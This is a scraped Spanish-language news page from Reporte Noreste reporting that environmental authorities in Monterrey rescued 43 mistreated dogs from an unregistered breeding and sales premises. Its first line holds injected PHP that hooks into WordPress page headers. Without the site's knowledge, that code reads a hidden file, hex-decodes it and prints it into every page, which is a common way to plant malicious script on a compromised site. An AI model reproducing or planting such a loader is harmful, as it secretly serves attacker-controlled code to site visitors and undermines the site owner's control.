if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Rescatan a 43 perritos en Monterrey – Reporte Noreste
Conéctate con nosotros

Noreste

Rescatan a 43 perritos en Monterrey

Rescatan a 43 perritos en Monterrey

En Nuevo León personal de la procuraduría estatal del medio aseguró a 43 perros que eran maltratados en un local en la zona centro de Monterrey.

El rescate de los animales se dio tras una denuncia ciudadana que señalaban al local, el cual tenía decenas de animales que se encontraban en condiciones inadecuadas dentro del inmueble.

Ante esto las autoridades iniciaron una visita al lugar donde presuntamente se realizaban actividades de cría y comercialización de animales, confirmando que carecían de atención y condiciones de higiene para los animales además que no contaba con el registro requerido para las actividades y no tenía posición de certificado de procedencia de cada uno de los perros, logrando la clausura temporal del establecimiento como medida de seguridad.

Los perros rescatados quedaron bajo el cuidado y resguardo de un hogar temporal donde serán alimentados y cuidados

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Noreste